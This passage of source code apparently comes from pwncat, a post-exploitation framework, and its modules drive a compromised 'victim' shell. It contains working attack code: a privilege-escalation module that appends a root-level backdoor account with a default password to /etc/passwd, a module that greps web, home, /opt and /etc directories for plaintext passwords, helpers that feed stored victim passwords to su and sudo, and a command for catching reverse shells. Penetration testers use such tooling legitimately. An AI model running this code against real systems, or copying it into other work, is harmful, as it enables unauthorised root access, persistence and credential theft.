        knowing the intended file length prior to opening. Optionally, a suffix can be
        added to the random file name. A file-like object is returned. The temporary
        file is not removed by pwncat itself. Unless explicitly removed, it will continue
        to exist until the remote operating system cleans up temporary files (possible
        at the next reboot).

        :param mode: the open-mode for the new file-like object
        :type mode: str
        :param length: the intended length for the new file random name component
        :type length: int
        :param suffix: a suffix for the filename
        :type suffix: str
        :param directory: a directory where the temporary file will be placed
        :type directory: str or Path-like
        :return: a file-like object
        """

        if length is None:
            length = 8

        if suffix is None:
            suffix = ""

        path = ""

        # Find a suitable temporary directory
        if directory is not None:
            tempdir = self.Path(directory)
        if directory is None or not tempdir.is_dir():
            tempdir = self.Path("/dev/shm")
        if not tempdir.is_dir():
            tempdir = self.Path("/tmp")
        if not tempdir.is_dir():
            raise FileNotFoundError("no temporary directories!")

        # This is safer, and costs less, but `mktemp` may not exist
        mktemp = self.which("mktemp")
        if mktemp is not None:
            try:
                result = self.run(
                    [mktemp, "-p", str(tempdir), "--suffix", suffix, "X" * length],
                    capture_output=True,
                    text=True,
                )
                path = result.stdout.rstrip("\n")
            except CalledProcessError as exc:
                raise PermissionError(str(exc))
        else:
            path = tempdir / (util.random_string(length) + suffix)
            while path.exists():
                path = tempdir / (util.random_string(length) + suffix)

        return self.open(path, **kwargs)

    def su(self, user: str, password: Optional[str] = None):
        """
        Attempt to switch users in the running shell. This normally executes a new
        sub-shell as the requested user. On unix-like systems, this is simply a
        wrapper for the ``su`` command. Implementations may differ on other systems.
        If a password isn't provided, the database will be consulted for a matching
        username and password.

        :param user: the name of the new user
        :type user: str
        :param password: the password for the new user
        :type password: str
        :raises:
          PermissionError: the provided password was incorrect
        """

        # We need a pty to call `su`
        self.get_pty()

        current_user = self.session.current_user()

        if password is None and current_user.id:
            password = current_user.password

        if current_user.id != 0 and password is None:
            raise PermissionError("no password provided")

        # Run `su`
        proc = self.Popen(
            ["su", user], stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True
        )

        # Assume we don't need a password if we are root
        if current_user.id != 0:

            # Read password: prompt
            proc.stdout.read(10)

            # Send the password
            proc.stdin.write(password + "\n")
            proc.stdin.flush()

            # line from when we pressed enter above
            proc.stdout.readline()

            # check the next few bytes; we have to go around the proc.stdin
            # because we need a peek with a timeout.
            result = self.channel.peek(10, timeout=5)

            # Check for keywords indicating failure
            if b"su: " in result.lower():

                try:
                    # The call failed, wait for the result
                    proc.wait(timeout=5)
                except TimeoutError:
                    proc.kill()
                    proc.wait()

                # Raise an error. The password was incorrect
                raise PermissionError("incorrect password")

        proc.detach()

    def sudo(
        self,
        command: Union[str, List[str]],
        user: Optional[str] = None,
        group: Optional[str] = None,
        password: Optional[str] = None,
        as_is: bool = False,
        **popen_kwargs,
    ):
        r"""
        Run the specified command as the specified user and group. On unix-like systems
        the normally translates to the ``sudo`` command. The command is executed using
        the ``self.popen`` method. All arguments not documented here are passed directly
        to ``self.popen``. The process is executed and if a password is required, it is
        sent from the database. If a password is not available, the process is killed
        and a PermissionError is raised. If the password is incorrect, a PermissionError
        is also raised.

        :param command: either an argument array or command line string
        :type command: str
        :param user: the name of a user to execute as or None
        :type user: str
        :param group: the group to execute as or None
        :type group: str
        :param password: the password for the current user
        :type password: str
        :param as_is: indicates to not add ``sudo`` to the command line
        :type as_is: bool
        :param \*\*popen_kwargs: arguments passed to the ``Popen`` method
        """

        # This repeats some of the logic from `Popen`, but we need to handle these
        # cases specially for `sudo`.
        if isinstance(command, list):
            command = shlex.join(command)
        elif not isinstance(command, str):
            raise ValueError("expected a command string or list of arguments")

        if "shell" in popen_kwargs and popen_kwargs["shell"]:
            command = shlex.join(["/bin/sh", "-c", command])
            popen_kwargs["shell"] = False

        if "env" in popen_kwargs and popen_kwargs["env"] is not None:
            command = (
                " ".join(
                    [
                        f"{util.quote(name)}={util.quote(value)}"
                        for name, value in popen_kwargs["env"].items()
                    ]
                )
                + " "
                + command
            )
            popen_kwargs["env"] = None

        if password is None:
            password = self.session.current_user().password

        # At this point, the command is a string
        if not as_is:
            if password is not None:
                sudo_command = "sudo -p 'Password: ' "
            else:
                sudo_command = "sudo -n "

            if user is not None:
                sudo_command += f"-u {user}"
            if group is not None:
                sudo_command += f"-g {group}"

            command = sudo_command + " " + command
        else:
            # We need to inject the `-p 'Password: '` or `-n`
            command = shlex.split(command)
            if password is not None:
                command.insert(1, "-p")
                command.insert(2, "Password: ")
            else:
                command.insert(1, "-n")
            command = shlex.join(command)

        # We need to send the password
        popen_kwargs["stdin"] = subprocess.PIPE

        # Start the process
        proc = self.Popen(args=command, **popen_kwargs)

        # There's no password to deliver. It either succeeded or failed :shrug:
        if password is None:

            output = self.channel.peek(16, timeout=1).lower()
            if output == "sudo: a password":
                # Cleanup the process
                proc.wait()
                # Inform the caller
                raise PermissionError("incorrect password or sudo permissions")

            return proc

        # Peek output to check for a password prompt
        # This bypasses the `proc.stdout_raw` ChannelFile, but
        # is necessary to access the peek buffer. The data will
        # still be available to the file wrappers later.
        output = self.channel.peek(16, timeout=2).lower()
        if (
            b"[sudo]" in output
            or b"password for " in output
            or output.endswith(b"password: ")
            or b"lecture" in output
        ):

            # Drain remaining data in the socket (and peek buffer)
            self.channel.drain()

            # Send the password
            self.channel.sendline(password.encode("utf-8"))

            self.channel.recvuntil(b"\n")

            # We use a longer timeout because sudo sometimes waits
            # to prevent bruteforce attacks
            output = self.channel.peek(16, timeout=6).lower()

            if (
                b"[sudo]" in output
                or b"password for" in output
                or b"sorry," in output
                or b"sudo: " in output
                or output.endswith(b"password: ")
            ):
                # End the process (with C-c)
                proc.kill()
                raise PermissionError("incorrect password or sudo permissions")

        return proc

    @property
    def interactive(self) -> bool:
        """
        Indicates whether the remote victim shell is currently in a state suitable for
        user-interactivity. Setting this property to True will ensure that a suitable
        shell prompt is set, echoing is one, etc.
        """

        return self._interactive

    @interactive.setter
    def interactive(self, value: bool):
        """
        Enable or disable interactivity for this victim.
        """

        if value == self._interactive:
            return

        if not value:
            command = " ; ".join([" stty -echo nl lnext ^V", "export PS1="]) + "\n"
            self.logger.info(command.rstrip("\n"))
            self.channel.send(command.encode("utf-8"))
            self.channel.drain()
            self._interactive = False

            # Update self.shell just in case the user changed shells
            try:
                # Get the PID of the running shell
                pid = self.getenv("$")
                # Grab the path to the executable representing the shell
                self.shell = self.Path("/proc", pid, "exe").readlink()
            except (FileNotFoundError, PermissionError, OSError):
                # Fall back to SHELL even though it's not really trustworthy
                self.shell = self.getenv("SHELL")
                if self.shell is None or self.shell == "":
                    self.shell = "/bin/sh"

            # Refresh the currently tracked user and group IDs
            self.refresh_uid()
        else:

            # Going interactive requires a pty
            self.get_pty()

            # Get local terminal information
            TERM = os.environ.get("TERM", "xterm")
            columns, rows = os.get_terminal_size(0)

            prompt = self.PROMPTS.get(
                os.path.basename(self.shell), self.PROMPTS["default"]
            )

            # Drain any remaining output from the commands run by pwncat
            self.channel.drain()

            command = (
                " ; ".join(
                    [
                        " stty sane",
                        f" stty rows {rows} columns {columns}",
                        f" export TERM='{TERM}'",
                        f"""export PS1={prompt}""",
                    ]
                )
                + "\n"
            )
            self.logger.info(command.rstrip("\n"))
            self.channel.send(command.encode("utf-8"))

            try:
                # Try to remove the echo of the above command, if it exists
                echo_check = self.channel.peek(len(command), timeout=0.5)
                if b"stty" in echo_check:
                    self.channel.recvline()
            except pwncat.channel.ChannelTimeout:
                pass

            self._interactive = True

    def whoami(self):
        """Get the name of the current user"""

        return self.run(
            ["whoami"], capture_output=True, check=True, encoding="utf-8"
        ).stdout.rstrip("\n")

    def _parse_stat(self, result: str) -> os.stat_result:
        """Parse the output of a stat command"""

        # Reverse the string. The filename may have a space in it, so we do this
        # to properly parse it.
        result = result.rstrip("\n")[::-1]
        fields = [field[::-1] for field in result.split(" ")]

        # Field order:
        #  0  optimal I/O transfer size
        #  1  time of file birth
        #  2  time of last status change
        #  3  time of last data modification
        #  4  time of last access
        #  5  minor device type (hex)
        #  6  major device type (hex)
        #  7  number of hard links
        #  8  inode number
        #  9  device number (hex)
        #  10 group id of owner
        #  11 user id of owner
        #  12 raw mode (hex)
        #  13 number of blocks allocated
        #  14 total size in bytes

        for i in range(len(fields)):
            if fields[i] == "?":
                fields[i] = "0"

        # Fix stat output issues in some enviroments
        if fields[1] == "W":
            fields[1] = "0"

        stat = os.stat_result(
            tuple(
                [
                    int(fields[12], 16),
                    int(fields[8]),
                    int(fields[9], 16),
                    int(fields[7]),
                    int(fields[11]),
                    int(fields[10]),
                    int(fields[14]),
                    int(fields[4]),
                    int(fields[3]),
                    int(fields[2]),
                    int(fields[13]),
                    int(fields[1]),
                ]
            )
        )

        return stat

    def stat(self, path: str) -> os.stat_result:
        """Perform the equivalent of the stat syscall on
        the remote host"""

        while True:
            try:
                result = self.run(
                    [
                        "stat",
                        "-L",
                        "-c",
                        "%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o",
                        path,
                    ],
                    capture_output=True,
                    encoding="utf-8",
                    check=True,
                )
            except CalledProcessError as exc:
                raise FileNotFoundError(path) from exc

            try:
                return self._parse_stat(result.stdout)
            except IndexError:
                pass

    def lstat(self, path: str) -> os.stat_result:
        """Perform the equivalent of the lstat syscall"""

        while True:
            try:
                result = self.run(
                    [
                        "stat",
                        "-c",
                        "%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o",
                        path,
                    ],
                    capture_output=True,
                    encoding="utf-8",
                    check=True,
                )
            except CalledProcessError as exc:
                raise FileNotFoundError(path) from exc

            try:
                return self._parse_stat(result.stdout)
            except IndexError:
                pass

    def abspath(self, path: str) -> str:
        """Attempt to resolve a path to an absolute path"""

        try:
            result = self.run(
                ["realpath", path], capture_output=True, text=True, check=True
            )
            return result.stdout.rstrip("\n")
        except CalledProcessError as exc:
            raise FileNotFoundError(path) from exc

    def readlink(self, path: str):
        """Attempt to read the target of a link"""

        try:
            self.lstat(path)
            result = self.run(
                ["readlink", path], capture_output=True, text=True, check=True
            )
            return result.stdout.rstrip("\n")
        except CalledProcessError as exc:
            raise OSError(f"Invalid argument: '{path}'") from exc

    def umask(self, mask: int = None):
        """Set or retrieve the current umask value"""

        if mask is None:
            return int(
                self.run(["umask"], capture_output=True, text=True, check=True).stdout,
                8,
            )

        self.run(["umask", oct(mask)[2:]])
        return mask

    def touch(self, path: str):
        """Update a file modification time and possibly create it"""

        self.run(["touch", path])

    def chmod(self, path: str, mode: int, link: bool = False):
        """Update the file permissions"""

        if link:
            self.run(["chmod", "-h", oct(mode)[2:], path])
        else:
            self.run(["chmod", oct(mode)[2:], path])

    def chown(self, path: str, uid: int, gid: int):
        """Change ownership of a file"""

        try:
            self.run(["chown", f"{uid}:{gid}", path], check=True)
        except CalledProcessError:
            raise PermissionError("failed to change ownership")

    def mkdir(self, path: str, mode: int = 0o777, parents: bool = False):
        """Create a new directory"""

        try:
            if parents:
                self.run(
                    ["mkdir", "-p", "-m", oct(mode)[2:], path], text=True, check=True
                )
            else:
                self.run(
                    ["mkdir", "-p", "-m", oct(mode)[2:], path], text=True, check=True
                )
        except CalledProcessError as exc:
            if "exists" in exc.stdout:
                raise FileExistsError(exc.stdout) from exc
            else:
                raise FileNotFoundError(exc.stdout) from exc

    def rename(self, source: str, target: str):
        """Rename a file from the source to the target. This should
        replace the target if it exists."""

        try:
            self.run(["mv", source, target], check=True)
        except CalledProcessError as exc:
            raise FileNotFoundError(source) from exc

    def rmdir(self, target: str):
        """Remove the specified directory. It must be empty."""

        try:
            self.run(["rmdir", target], check=True)
        except CalledProcessError as exc:
            raise OSError(f"Directory not empty: {target}") from exc

    def symlink_to(self, source: str, target: str):
        """Create a symbolic link to source from target"""

        # Since this function is unlikely to be called outside of
        # the path abstraction, we don't do much error checking.
        # We can't reliably tell what happened when the process
        # fails without checking stat output which is easier from
        # the path abstraction itself.
        self.run(["ln", "-s", source, target], check=True)

    def link_to(self, source: str, target: str):
        """Create a filesystem hard link."""

        # Same warning as with symlink
        self.run(["ln", source, target], check=True)

    def unlink(self, target: str):
        """Remove a link to a file (similar to `rm`)"""

        try:
            self.run(["rm", target], check=True)
        except CalledProcessError as exc:
            raise FileNotFoundError(target) from exc



#!/usr/bin/env python3

import pwncat
from pwncat.modules import Status, BaseModule, ModuleFailed


class Module(BaseModule):
    """Clean up any modifications to the target. This mainly includes
    tampers saved in the database, but could include other changes added
    to future versions of pwncat."""

    PLATFORM = None

    def run(self, session: "pwncat.manager.Session"):
        """Iterate over all tampers and revert what we can"""

        current_user = session.current_user()

        for tamper in session.run("enumerate", types=["tamper"]):
            if not tamper.revertable:
                session.log(
                    f"[yellow]warning[/yellow]: {tamper.title(session)}: not revertable"
                )
                continue
            if current_user.id != tamper.uid:
                session.log(
                    f"[yellow]warning[/yellow]: {tamper.title(session)}: incorrect uid to revert"
                )
                continue

            try:
                # Attempt tamper revert
                yield Status(tamper.title(session))
                tamper.revert(session)
            except ModuleFailed as exc:
                session.log(f"[yellow]warning[/yellow]: {tamper.title(session)}: {exc}")

        session.db.transaction_manager.commit()



#!/usr/bin/env python3
import re
import sys

from rich import box
from rich.table import Table

import pwncat
from pwncat.util import console
from pwncat.channel import ChannelError
from pwncat.modules import ModuleFailed
from pwncat.commands import Complete, Parameter, CommandDefinition
from pwncat.platform import PlatformError


class Command(CommandDefinition):
    """
    Connect to a remote victim. This command is only valid prior to an established
    connection. This command attempts to act similar to common tools such as netcat
    and ssh simultaneously. Connection strings come in two forms. Firstly, pwncat
    can act like netcat. Using `connect [host] [port]` will connect to a bind shell,
    while `connect -l [port]` will listen for a reverse shell on the specified port.

    The second form is more explicit. A connection string can be used of the form
    `[protocol://][user[:password]@][host][:port]`. If a user is specified, the
    default protocol is `ssh`. If no user is specified, the default protocol is
    `connect` (connect to bind shell). If no host is specified or `host` is "0.0.0.0"
    then the `bind` protocol is used (listen for reverse shell). The currently available
    protocols are:

    - ssh
    - connect
    - bind

    The `--identity/-i` argument is ignored unless the `ssh` protocol is used.
    """

    PROG = "connect"
    ARGS = {
        "--identity,-i": Parameter(
            Complete.LOCAL_FILE,
            help="The private key for authentication for SSH connections",
        ),
        "--listen,-l": Parameter(
            Complete.NONE,
            action="store_true",
            help="Enable the `bind` protocol (supports netcat-like syntax)",
        ),
        "--platform,-m": Parameter(
            Complete.NONE,
            help="Name of the platform to use (default: linux)",
            default="linux",
        ),
        "--port,-p": Parameter(
            Complete.NONE,
            help="Alternative port number argument supporting netcat-like syntax",
        ),
        "--list": Parameter(
            Complete.NONE,
            action="store_true",
            help="List installed implants with remote connection capability",
        ),
        "--ssl-cert": Parameter(
            Complete.LOCAL_FILE,
            help="Certificate for SSL-encrypted listeners (PEM)",
        ),
        "--ssl-key": Parameter(
            Complete.LOCAL_FILE, help="Key for SSL-encrypted listeners (PEM)"
        ),
        "--ssl": Parameter(
            Complete.NONE, action="store_true", help="Connect or listen with SSL"
        ),
        "connection_string": Parameter(
            Complete.NONE,
            metavar="[protocol://][user[:password]@][host][:port]",
            help="Connection string describing the victim to connect to",
            nargs="?",
        ),
        "pos_port": Parameter(
            Complete.NONE,
            nargs="?",
            metavar="port",
            help="Alternative port number argument supporting netcat-like syntax",
        ),
    }
    LOCAL = True
    CONNECTION_PATTERN = re.compile(
        r"""^(?P<protocol>[-a-zA-Z0-9_]*://)?((?P<user>[^:@]*)?(?P<password>:(\\@|[^@])*)?@)?(?P<host>[^:]*)?(?P<port>:[0-9]*)?(\?(?P<querystring>.*))?$"""
    )

    def run(self, manager: "pwncat.manager.Manager", args):

        query_args = {}
        query_args["protocol"] = None
        query_args["user"] = None
        query_args["password"] = None
        query_args["host"] = None
        query_args["port"] = None
        query_args["platform"] = args.platform
        query_args["identity"] = args.identity
        query_args["certfile"] = args.ssl_cert
        query_args["keyfile"] = args.ssl_key
        query_args["ssl"] = args.ssl
        querystring = None
        used_implant = None

        if args.list:

            db = manager.db.open()
            implants = []

            table = Table(
                "ID",
                "Address",
                "Platform",
                "Implant",
                "User",
                box=box.MINIMAL_DOUBLE_HEAD,
            )

            # Locate all installed implants
            for target in db.root.targets:

                # Collect users
                users = {}
                for fact in target.facts:
                    if "user" in fact.types:
                        users[fact.id] = fact

                # Collect implants
                for fact in target.facts:
                    if "implant.remote" in fact.types:
                        table.add_row(
                            target.guid,
                            target.public_address[0],
                            target.platform,
                            fact.source,
                            users[fact.uid].name,
                        )

            if not table.rows:
                console.log("[red]error[/red]: no remote implants found")
            else:
                console.print(table)

            return

        if args.connection_string:
            m = self.CONNECTION_PATTERN.match(args.connection_string)
            query_args["protocol"] = m.group("protocol")
            query_args["user"] = m.group("user")
            query_args["password"] = m.group("password")
            query_args["host"] = m.group("host")
            query_args["port"] = m.group("port")
            querystring = m.group("querystring")

            if query_args["protocol"] is not None:
                query_args["protocol"] = query_args["protocol"].removesuffix("://")

            if query_args["password"] is not None:
                query_args["password"] = query_args["password"].removeprefix(":")

        if querystring is not None:
            for arg in querystring.split("&"):
                if arg.find("=") == -1:
                    continue

                key, *value = arg.split("=")

                if key in query_args and query_args[key] is not None:
                    console.log(f"[red]error[/red]: multiple values for {key}")
                    return

                query_args[key] = "=".join(value)

        if query_args["host"] is not None and query_args["host"] == "":
            query_args["host"] = None

        if query_args["protocol"] is not None and args.listen:
            console.log(
                "[red]error[/red]: --listen is not compatible with an explicit connection string"
            )
            return
        elif args.listen:
            query_args["protocol"] = "bind"

        if (query_args["certfile"] is None and query_args["keyfile"] is not None) or (
            query_args["certfile"] is not None and query_args["keyfile"] is None
        ):
            console.log(
                "[red]error[/red]: both a ssl certificate and key file are required"
            )
            return

        if query_args["certfile"] is not None or query_args["keyfile"] is not None:
            query_args["ssl"] = True

        if query_args["protocol"] not in [None, "bind", "connect"] and query_args.get(
            "ssl"
        ):
            console.log(
                f"[red]error[/red]: --ssl is incompatible with an [yellow]{query_args['protocol']}[/yellow] protocol"
            )
            return
        elif query_args["protocol"] is not None and query_args.get("ssl"):
            query_args["protocol"] = "ssl-" + query_args["protocol"]

        if (
            sum(
                [
                    query_args["port"] is not None,
                    args.port is not None,
                    args.pos_port is not None,
                ]
            )
            > 1
        ):
            console.log("[red]error[/red]: multiple ports specified")
            return

        if args.port is not None:
            query_args["port"] = args.port
        if args.pos_port is not None:
            query_args["port"] = args.pos_port

        if query_args["port"] is not None:
            try:
                query_args["port"] = int(query_args["port"].lstrip(":"))
            except ValueError:
                console.log(
                    f"[red]error[/red]: {query_args['port'].lstrip(':')}: invalid port number"
                )
                return

        # Attempt to reconnect via installed implants
        if (
            query_args["protocol"] is None
            and query_args["password"] is None
            and query_args["port"] is None
            and args.identity is None
        ):
            db = manager.db.open()
            implants = []

            # Locate all installed implants
            for target in db.root.targets:

                if (
                    target.guid != query_args["host"]
                    and target.public_address[0] != query_args["host"]
                ):
                    continue

                # Collect users
                users = {}
                for fact in target.facts:
                    if "user" in fact.types:
                        users[fact.id] = fact

                # Collect implants
                for fact in target.facts:
                    if "implant.remote" in fact.types:
                        implants.append((target, users[fact.uid], fact))

            for target, implant_user, implant in implants:
                # Check correct query_args["user"]
                if (
                    query_args["user"] is not None
                    and implant_user.name != query_args["user"]
                ):
                    continue
                # Check correct platform
                if (
                    query_args["platform"] is not None
                    and target.platform != query_args["platform"]
                ):
                    continue

                manager.log(f"trigger implant: [cyan]{implant.source}[/cyan]")

                # Attempt to trigger a new session
                try:
                    session = implant.trigger(manager, target)
                    manager.target = session
                    used_implant = implant
                    break
                except (ChannelError, PlatformError, ModuleFailed):
                    db.transaction_manager.commit()
                    continue

        if used_implant is not None:
            manager.target.log(f"connected via {used_implant.title(manager.target)}")
        else:
            try:
                manager.create_session(**query_args)
            except (ChannelError, PlatformError) as exc:
                manager.log(f"connection failed: {exc}")
            except KeyboardInterrupt:
                # hide '^C' from the output
                sys.stdout.write("\b\b\r")
                manager.log("[yellow]warning[/yellow]: cancelled by user")



#!/usr/bin/env python3
import crypt

import pwncat
from pwncat.util import console
from pwncat.facts import EscalationReplace
from pwncat.modules import ModuleFailed
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule
from pwncat.modules.linux.implant.passwd import PasswdImplant


class AppendPasswd(EscalationReplace):
    """Escalation through adding a new user to /etc/passwd"""

    def __init__(self, source, ability):
        super().__init__(source=source, source_uid=ability.source_uid, uid=ability.uid)

        self.ability = ability

    def escalate(self, session: "pwncat.manager.Session"):

        try:
            with session.platform.open("/etc/passwd", "r") as filp:
                passwd_contents = list(filp)
        except (FileNotFoundError, PermissionError):
            raise ModuleFailed("failed to read /etc/passwd")

        backdoor_user = session.config.get("backdoor_user", "pwncat")
        backdoor_pass = session.config.get("backdoor_pass", "pwncat")
        shell = session.platform.getenv("SHELL")

        # Hash the backdoor password
        backdoor_hash = crypt.crypt(backdoor_pass, crypt.METHOD_SHA512)

        if not any(line.startswith(f"{backdoor_user}:") for line in passwd_contents):

            # Add our password
            "".join(passwd_contents)
            new_line = f"""{backdoor_user}:{backdoor_hash}:0:0::/root:{shell}\n"""
            passwd_contents.append(new_line)

            try:
                # Write the modified password entry back
                with self.ability.open(session, "/etc/passwd", "w") as filp:
                    filp.writelines(passwd_contents)

                # Ensure we track the tampered file
                session.register_fact(
                    PasswdImplant(
                        "linux.implant.passwd",
                        backdoor_user,
                        backdoor_pass,
                        new_line,
                    )
                )
            except (FileNotFoundError, PermissionError):
                raise ModuleFailed("failed to write /etc/passwd")

        else:
            console.log(
                f"[cyan]{backdoor_user}[/cyan] already exists; attempting authentication"
            )

        try:
            session.platform.su(backdoor_user, password=backdoor_pass)
            return lambda session: session.platform.channel.send(b"exit\n")
        except PermissionError:
            raise ModuleFailed("added user, but switch user failed")

    def title(self, session: "pwncat.manager.Session"):
        return f"""add user using {self.ability.title(session)}"""


class Module(EnumerateModule):
    """Check for possible methods of escalation via modifying /etc/passwd"""

    PROVIDES = ["escalate.replace"]
    SCHEDULE = Schedule.PER_USER
    PLATFORM = [Linux]

    def enumerate(self, session):

        for ability in session.run("enumerate.gather", types=["ability.file.write"]):
            if ability.uid != 0:
                continue

            yield AppendPasswd(self.name, ability)



#!/usr/bin/env python3

from pwncat.db import Fact
from pwncat.modules import ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import EnumerateModule


class LSAProtectionData(Fact):
    def __init__(self, source, active: bool):
        super().__init__(source=source, types=["protections.lsa"])

        self.active: bool = active

    def title(self, session):
        out = "LSA Protection is "
        out += (
            "[bold red]active[/bold red]"
            if self.active
            else "[bold green]inactive[/bold green]"
        )
        return out

    def description(self, session):
        return None


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["protections.lsa"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        registry_value = "RunAsPPL"
        registry_key = "HKLM:\\SYSTEM\\CurrentControlSet\\Control\\LSA"

        try:
            result = session.platform.powershell(
                f"Get-ItemPropertyValue {registry_key} -Name {registry_value}"
            )

            if not result:
                raise ModuleFailed(
                    f"failed to retrieve registry value {registry_value}"
                )

            status = bool(result[0])

        except PowershellError as exc:
            if "does not exist" in exc.message:
                status = bool(0)  # default
            else:
                raise ModuleFailed(
                    f"could not retrieve registry value {registry_value}: {exc}"
                ) from exc

            yield LSAProtectionData(self.name, status)



#!/usr/bin/env python3
import os
import re

import pwncat
from pwncat.facts import PotentialPassword
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """
    Search the victim file system for configuration files which may
    contain passwords. This uses a regular expression based search
    to abstractly extract things which look like variable assignments
    within configuration files that look like passwords.
    """

    PROVIDES = ["creds.password"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.PER_USER

    def enumerate(self, session):

        # The locations we will search in for passwords
        locations = ["/var/www", "$HOME", "/opt", "/etc"]
        # Known locations which match this search but don't contain useful entries
        blacklist = ["openssl.cnf", "libuser.conf"]
        # The types of files which are "code". This means that we only recognize the
        # actual password if it is a literal value (enclosed in single or double quotes)
        code_types = [".c", ".php", ".py", ".sh", ".pl", ".js", ".ini", ".json"]
        # grep = pwncat.victim.which("grep")
        grep = "grep"

        if grep is None:
            return

        command = f"{grep} -InriE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null"

        # Run the command on the remote host
        proc = session.platform.Popen(
            command, shell=True, stdout=pwncat.subprocess.PIPE
        )

        # Iterate through the output
        with proc.stdout as filp:
            for line in filp:
                try:
                    # Decode the line and separate the filename, line number, and content
                    line = line.decode("utf-8").strip().split(":")
                except UnicodeDecodeError:
                    continue

                # Ensure we got all three (should always be 3)
                if len(line) < 3:
                    continue

                # Extract each individual piece
                path = line[0]
                content = ":".join(line[2:])
                try:
                    lineno = int(line[1])
                except ValueError:
                    # If this isn't an integer, we can't trust the format of the line...
                    continue

                password = None

                # Ensure this file isn't in our blacklist
                # We will still report it but it won't produce actionable passwords
                # for privesc because the blacklist files have a high likelihood of
                # false positives.
                if os.path.basename(path) not in blacklist:
                    # Check for simple assignment
                    match = re.search(r"password\s*=(.*)", content, re.IGNORECASE)
                    if match is not None:
                        password = match.group(1).strip()

                    # Check for dictionary like in python with double quotes
                    match = re.search(r"password[\"']\s*:(.*)", content, re.IGNORECASE)
                    if match is not None:
                        password = match.group(1).strip()

                    # Check for dictionary is perl
                    match = re.search(
                        r"password[\"']?\s+=>(.*)", content, re.IGNORECASE
                    )
                    if match is not None:
                        password = match.group(1).strip()

                    # Don't mark empty passwords
                    if password is not None and password == "":
                        password = None

                    if password is not None:
                        _, extension = os.path.splitext(path)

                        # Ensure that this is a constant string. For code file types,
                        # this is normally indicated by the string being surrounded by
                        # either double or single quotes.
                        if extension in code_types:
                            if password[-1] == ";":
                                password = password[:-1]
                            if password[0] == '"' and password[-1] == '"':
                                password = password.strip('"')
                            elif password[0] == "'" and password[-1] == "'":
                                password = password.strip("'")
                            else:
                                # This wasn't assigned to a constant, it's not helpful to us
                                password = None

                        # Empty quotes? :(
                        if password == "":
                            password = None

                # This was a match for the search. We  may have extracted a
                # password. Either way, log it.
                fact = PotentialPassword(self.name, password, path, lineno, uid=None)
                yield fact

        proc.wait()



"""
Tampers are modifications which we knowingly made to the target host.
pwncat tracks tampers wherever it can in order to warn the user that
modifications have been made, and in some cases provide the ability
to revert those modifications. This is not foolproof, but provides
some ability to track your changes when on target.
"""
import datetime
from typing import Union, Optional

import pwncat
from pwncat.db import Fact
from pwncat.modules import ModuleFailed


class Tamper(Fact):
    """A generic "tamper" or modification to the remote
    target. Tampers can sometimes be reverted automatically,
    but at worst are tracked through the enumeration system.

    :param source: a string describing the module or routine that generated the tamper
    :type source: str
    :param uid: the user ID needed to revert the tamper
    :type uid: Union[int, str]
    :param timestamp: the datetime that this change occurred
    :type timestamp: Optional[datetime.datetime]
    """

    def __init__(
        self,
        source: str,
        uid: Union[int, str],
        timestamp: Optional[datetime.datetime] = None,
    ):
        super().__init__(source=source, types=["tamper"])

        self.uid = uid
        self.timestamp = timestamp if timestamp is not None else datetime.datetime.now()
        self.reverted = False

    @property
    def revertable(self):
        """Test if this tamper is currently revertable"""
        return False

    def revert(self, session: "pwncat.manager.Session"):
        """Attempt to revert the tamper through the given session.

        :param session: the session on which to operate
        :type session: pwncat.manager.Session
        """
        raise ModuleFailed("not revertable")

    def _annotate_title(self, session, title):
        """Just a helper for annotating the description with details on
        the needed user and current revertability/state of the tamper."""

        if self.reverted:
            return f"{title} ([green]reverted[/green])"

        if self.revertable:
            target_user = session.find_user(uid=self.uid)
            return f"{title} ([yellow]revertable[/yellow] as [blue]{target_user.name}[/blue])"

        return f"{title} ([red]non-revertable[/red]!)"


class ReplacedFile(Tamper):
    """Represents a file that was replaced on the remote host.
    This is a revertable tamper as long as the data was stored
    prior to replacement.

    :param source: generating module or routine
    :type source: str
    :param uid: UID needed to revert
    :type uid: Union[int, str]
    :param path: path to replaced file
    :type path: str
    :param data: the original data in the file
    :type data: Optional[Union[str, bytes]]
    :param timestamp: the datetime that this change occurred
    :type timestamp: Optional[datetime.datetime]
    """

    def __init__(
        self,
        source: str,
        uid: Union[int, str],
        path: str,
        data: Optional[Union[str, bytes]],
        timestamp: Optional[datetime.datetime] = None,
    ):
        super().__init__(source, uid, timestamp=timestamp)

        if isinstance(data, str):
            data = data.encode("utf-8")

        self.path = str(path)
        self.data = data

    def revert(self, session: "pwncat.manager.Session"):

        if self.data is None:
            raise ModuleFailed("original data not preserved")

        current_uid = session.platform.getuid()
        if current_uid != self.uid:
            target_user = session.find_user(uid=self.uid)
            raise ModuleFailed(f"incorrect permission (need: {target_user.name})")

        # Re-write the original data to the file
        with session.platform.open(self.path, "wb") as filp:
            filp.write(self.data)

        self.reverted = True

    @property
    def revertable(self):
        if self.data is None:
            return False
        return True

    def title(self, session: "pwncat.manager.Session"):

        return self._annotate_title(
            session, f"replace content of [cyan]{self.path}[/cyan]"
        )


class CreatedFile(Tamper):
    """Tracks a new file created on the target. This is normally
    revertable as we just need to delete the file.

    :param source: generating module or routine
    :type source: str
    :param uid: UID needed to revert
    :type uid: Union[int, str]
    :param path: path to replaced file
    :type path: str
    :param timestamp: the datetime that this change occurred
    :type timestamp: Optional[datetime.datetime]
    """

    def __init__(
        self,
        source: str,
        uid: Union[int, str],
        path: str,
        timestamp: Optional[datetime.datetime] = None,
    ):
        super().__init__(source, uid, timestamp=timestamp)

        self.path = path

    @property
    def revertable(self):
        return True

    def revert(self, session: "pwncat.manager.Session"):

        try:
            session.platform.Path(self.path).unlink()
        except FileNotFoundError:
            pass
        except PermissionError:
            raise ModuleFailed("permission error")

        self.reverted = True

    def title(self, session: "pwncat.manager.Session"):

        return self._annotate_title(
            session, f"created file at [cyan]{self.path}[/cyan]"
        )


class CreatedDirectory(Tamper):
